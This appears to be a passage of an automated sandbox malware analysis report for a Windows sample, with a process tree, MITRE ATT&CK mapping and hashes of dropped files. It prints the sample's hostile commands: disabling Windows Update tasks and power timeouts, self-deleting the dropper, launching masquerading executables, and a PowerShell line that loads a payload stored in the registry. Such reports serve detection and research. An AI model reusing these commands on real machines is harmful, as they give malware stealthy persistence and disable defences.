C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE9⤵PID:2160
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE9⤵PID:912
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE9⤵PID:2516
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE9⤵PID:2608
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE9⤵PID:2972
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE9⤵PID:2912
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 08⤵
- Power Settings
PID:1760 -
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 09⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2056
-
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 09⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2392
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 09⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2416
-
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 09⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2492
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe8⤵PID:2232
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "sjrcqeodaodte"9⤵PID:2864
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost.exe"5⤵PID:1224
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 36⤵PID:1524
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c start C:\Users\Admin\AppData\Local\Temp\explorer.exe2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2160 -
C:\Users\Admin\AppData\Local\Temp\explorer.exeC:\Users\Admin\AppData\Local\Temp\explorer.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2164
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c start C:\Users\Admin\AppData\Local\Temp\windowshost.exe2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2608 -
C:\Users\Admin\AppData\Local\Temp\windowshost.exeC:\Users\Admin\AppData\Local\Temp\windowshost.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2688 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\driverPerf\DDCzSbk7D28EdFKaphOM.vbe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2200 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\driverPerf\lG0LQTEIJKvWsYHAg5CgQ5boB.bat" "5⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\driverPerf\cominto.exe"C:\driverPerf\cominto.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1276
-
-
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {CC22A47E-939E-4EDD-B1E3-0BD47F9A66B3} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1276
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('dialerstager')).EntryPoint.Invoke($Null,$Null)"2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2640
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Create or Modify System Process
2Windows Service
2Power Settings
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Scheduled Task
1Defense Evasion
File and Directory Permissions Modification
1Impair Defenses
1Obfuscated Files or Information
1Command Obfuscation
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD519eab19c0d0a0b062c8eb85a94a79cc6
SHA13f0e2e88b9ff61e2e56edc473861cc4373af525a
SHA25602eb6c61b19d347b9b6846285991142bb0d7515401f8fc4cf7f961be72a3c215
SHA512550b2aa4b1892643f4a06d9df302f5685e9275ca9b302b8467fd35af806add36fe6ba6202488ea6209ee1b4a79f638d5f6e729bcf4a1b73fd38c4d4570b28223
-
Filesize
2.1MB
MD5fa0429acc4b9cfd414d24fae0e299790
SHA180d76038b5401080e18e6b015cbf806d9abe8589
SHA2561440a0bb2287c84bc89c40255413dc2cab070a4382b59e9cffaa3abfe7da5489
SHA512f6af06d7c505ab4d23a80fe616422302c5a87bfbefc81d6b0f4af36fcf86f30f865dcb4806581799a139f1b965c8d3b842125ac0b4c9a8ea59469601d9edff9e
-
Filesize
2.8MB
MD551ab765a1b1f884f936db4ffc642d728
SHA17b7741bf5dfeaed3860bf308733490017688fa46
SHA256816835537df73c3297cb1a0ddfe02d8f051f0fd9486ee2b1e53969b37fa87f14
SHA512e25fdd4a7f4fd8bfe9491ec8138ed08077c2c2cd63686e6e4a59859e27294cc35d0ff99ff0b29ae3c2901c6f99e970f6d8e80435d86811398fdb41cf1bbb5234
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5d3a0955c47a3fcabd8f137c96d581265
SHA1c9af30bd8a694e75149166980c60df703deeac8a
SHA256e3abd64ad50be9f537531dd992efdb9159edfa607bfe9dce059b960ade238a7d
SHA51234cdfc415f192bc283f87baf4104297dc5da5e254e7f420fe162c3880ba0ebeb8b8f418d89a6f5936eb2f9c88e2676cf03c1efce49f2986cf4e65fccf6c0e10f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5919e940093334a5ddbf62d248c870406
SHA1e2cb1f4464fe0d97ea82b7b4795afd82e675bed5
SHA25652968a70ee6265bb06ed5654316a9bbcd0d2245de9f69b4f4d9410bc9e78b198
SHA512edf0f4d4046b19afe61c67824981a142a01312f8ffd7279e3f2ef88c908a385ddc7b5a4f913525d3f36c14646e81d4520f87cb4394539372993d2a75ac7834b8
-
Filesize
478B
MD5f80133f903847e97e742d5e5025e675e
SHA120710f0785b24417a6b3b3a7d91412ef1efda909
SHA256993e9509a862a1e6b4b5ac75938f3092be9fb4d8862769b66007ec28dd461065
SHA512344d18f8e4bdfef6ac5054305f4f2b2901ca5f0560d3cc64628b8df9b023e96fcfd45e843e2e548e580c3c5d63ff5c74079cc0ee93011ac205160fff30f70135
-
Filesize
3KB
MD525e23e93f073fd8006c31578c6541ace
SHA14eb06835f9e4fb2c2eeda279d9bbdb777542c0e1
SHA256814d01a00d408bd0fbe158e9d1ab87b5a175ce5bcbcd17fb91d2d9e7fd836fee
SHA5121bd6cd3064d43bab429ad2d51ade125217bf24786c79492afb7c707bdda521f4dab4a0cec2678eb411e3ae86309011a576a59767ad64129523b42cd54b558b69
-
Filesize
212B
MD576764afd7b394cd6a9c36fa16d4c88fc
SHA15274a18139edf134230252c97652bfa6319b1a78
SHA256e58f2652ec82227d6ecacc733adb6e9812fcb39283ef87aba2be65326851e50e
SHA5123018cbc23b59527b0fe54fc17f13735dddf2e91ac188afb7abdb6fc932e2a965d725b0ffaa8b03fcc7c9f4fbd9f1ba3aafde6a2e3fe1112ccbe42fca44be01ae
-
Filesize
27B
MD561b88edb5f6dca914ee05650653d8223
SHA14b61f3f21e8c981aaa73e375d090de82be46720d
SHA256eba6d05af3adbcc9a111fe968c3a2c725221f8f7896df3490bc2509bec01cf12
SHA5121eea3fe2ca12c0d9bc3f9a7a13a1438cdd25e35607232025477af885db7987f6cd4d03613e6be0f6c8457e9db3eaf9b394f62ed14dffa4fbb36c1c07d8e5e7b5
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
2.5MB
MD54344aa160852993fab07ae5793321886
SHA1d33a04a9f58d6172bfaa611ceeb03b24b7c5bee5
SHA256bbbebdfec732e0805dc3865cfa2f546120e7300d8d6d98ba71ca85026375add4
SHA512557c569a182284d43db1342aaa64b61acae4665548fa2a7c63af05d45ae1058d070f536c6c80a859e54a051177d21cc21c86b3de4cb03d1d63c993495067d2c0